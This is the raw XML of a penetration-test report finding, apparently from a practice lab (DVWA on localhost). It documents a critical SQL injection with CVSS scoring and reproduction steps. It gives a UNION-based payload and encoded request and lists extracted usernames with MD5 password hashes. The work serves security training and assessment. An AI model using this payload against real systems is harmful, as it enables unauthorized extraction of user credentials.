      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>F-002  |  SQL Injection Leading to Unauthorized Database Data Extraction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="52E56223" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="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966105" w:rsidTr="356A7C40" w14:paraId="3C70AD1D"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3B6F3ACC" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title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7EBB013B" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SQL Injection Leading to Unauthorized Database Data Extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="513C7E4B"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4EEEC247" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FADBD8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="75C8B334" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="068C1921"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304F2D7B" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Score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0CECEAAE" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="1209E28B"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33C09B93" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Vector</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356A7C40" w14:paraId="43D974BD" w14:textId="77777777">
            <w:r w:rsidRPr="356A7C40">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="4EAA0088"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61200F98" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP Category</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436F59C9" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A03: Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="74B1EF9F"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1E4A4D55" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Affected URL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7244DCB9" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>http://localhost:4280/vulnerabilities/sqli/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="07547A01" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="02F99ED9" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="356A7C40" w14:paraId="14432B35" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>The application is vulnerable to SQL Injection through the id input parameter in the SQL Injection module. By injecting malicious SQL payloads, it was possible to manipulate backend database queries and extract sensitive data. During testing, a UNION-based SQL injection payload was successfully used to retrieve user account information including usernames and password hashes directly from the backend users table. This confirms the application does not properly validate, sanitize, or parameterize user-controlled input before executing SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="5043CB0F" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="3F3DD3FC" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>CVSS Breakdown</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60"/>
        <w:gridCol w:w="2520"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="6F7C1D08" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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69F9D08C" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="252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1628354A" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Value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368C23B8" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="75ACFE69"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41363C4" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Version</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E1731F0" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.1</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8D1B768" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Common Vulnerability Scoring System version used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="4631F1E1"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69C16DC" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Vector (AV)</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5D81DDC7" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>N (Network)</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555E18F5" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The vulnerability can be exploited remotely over a network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="29598A43"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4E638E3" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Complexity (AC)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932D868" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>L (Low)</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E39B16C" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitation is straightforward and does not require special conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="0D5E29C1"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540B04B" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privileges Required (PR)</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175E28FA"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6C4D40C8" w14:textId="77777777">
            <w:r w:rsidRPr="356A7C40">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No authentication or prior access is required to exploit the vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="41D63B3D"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0B774F6" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User Interaction (UI)</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6D40B534"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356A7C40" w14:paraId="51939952" w14:textId="77777777">
            <w:r w:rsidRPr="356A7C40">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No action from another user is required for successful exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="43BA6E93"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1C47C908" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scope (S)</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81FDEC2" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>U (Unchanged)</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5327911C" w14:textId="77777777">
            <w:r w:rsidRPr="356A7C40">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The impact remains within the same security boundary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="217420EF"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0F5B9A9" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confidentiality Impact (C)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EA9D04F"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5D54269" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sensitive data can be fully disclosed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="26A7E7F7"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11F71DC" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Integrity Impact (I)</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161D98D"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350870C1" w14:textId="77777777">
            <w:r w:rsidRPr="356A7C40">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Data can be modified or tampered with</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="7DA7A0BA"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397F499" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Availability Impact (A)</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C8FEA10"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D69FCCF" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Service or system availability can be significantly affected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="7F8D4CB3"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0733793" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Overall Score</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4809CE9C" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8 (Critical)</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879D767" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severe vulnerability with maximum business and security impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="07459315" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="108BD479" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="0EC0B086" w14:paraId="03EE0A24" w14:textId="66019A0F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="03E66DE5" w:rsidR="0EC0B086">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate to the SQL Injection page: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="03E66DE5" w:rsidRDefault="0EC0B086" w14:paraId="21C08FEE" w14:textId="253AF74A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="03E66DE5" w:rsidR="0EC0B086">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>http://localhost:4280/vulnerabilities/sqli/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="0EC0B086" w14:paraId="390F14DA" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Intercept the request using Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="1CD77F7D" w14:paraId="642C046F" w14:textId="54C44D36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">Modify the vulnerable id parameter with a UNION-based payload: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="1CD77F7D" w14:paraId="5F8E2C6E" w14:textId="2A98A7C2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>' UNION SELECT user,password FROM users-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="1CD77F7D" w14:paraId="1487B858" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>URL encode the payload and submit the request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="0EC0B086" w14:paraId="36233A17" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Observe the server response displaying extracted database records including usernames and password hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="6537F28F" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="0EC0B086" w14:paraId="2C691BB4" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5AD6BEBD" w:rsidP="485EA61B" w:rsidRDefault="5AD6BEBD" w14:paraId="14516BC8" w14:textId="48309C61">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03E19857" wp14:editId="06758310">
            <wp:extent cx="6400800" cy="3505200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7831180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118077" name="Picture 783118077"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6400800" cy="3505200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="485EA61B" w:rsidP="485EA61B" w:rsidRDefault="485EA61B" w14:paraId="4C8EF016" w14:textId="77B035E5">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="485EA61B" w:rsidP="485EA61B" w:rsidRDefault="485EA61B" w14:paraId="4A2BC442" w14:textId="52021027">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="485EA61B" w:rsidP="485EA61B" w:rsidRDefault="485EA61B" w14:paraId="0AEA95DB" w14:textId="42660D84">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="485EA61B" w:rsidP="485EA61B" w:rsidRDefault="485EA61B" w14:paraId="60E7490B" w14:textId="66704820">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="6DFB9E20" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="4433C280" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Proof of Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="70DF9E56" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="7DAD6EBC" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Injection Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="356A7C40" w:rsidRDefault="356A7C40" w14:paraId="417BE54D"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GET /vulnerabilities/sqli/?id=%27%20UNION%20SELECT%20user,password%20FROM%20users--%20-&amp;Submit=Submit HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="1862DDF3" w14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E5FA3" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FA"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Host: localhost:4280</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="356A7C40" w:rsidRDefault="356A7C40" w14:paraId="57DE7FF6"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Cookie: PHPSESSID=&lt;session_id&gt;; security=low</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="44E871BC" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="3615D39F" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Extracted Credentials:</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680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="6AD300A6" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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5D1DB14D" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Username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4EAB180D" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Password Hash (MD5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="3172271E" w14:textId="77777777">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17E34BD0" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>admin</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66806BDB" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5f4dcc3b5aa765d61d8327deb882cf99</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="7845BA6D" w14:textId="77777777">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356A7C40" w14:paraId="5BB35C0F" w14:textId="77777777">
            <w:r w:rsidRPr="356A7C40">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gordonb</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B97B025" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>e99a18c428cb38d5f260853678922e03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="0A1A1D47" w14:textId="77777777">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43339C86" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1337</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3FB95261" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8d3533d75ae2c3966d7e0d4fcc69216b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="144A5D23" w14:textId="77777777">
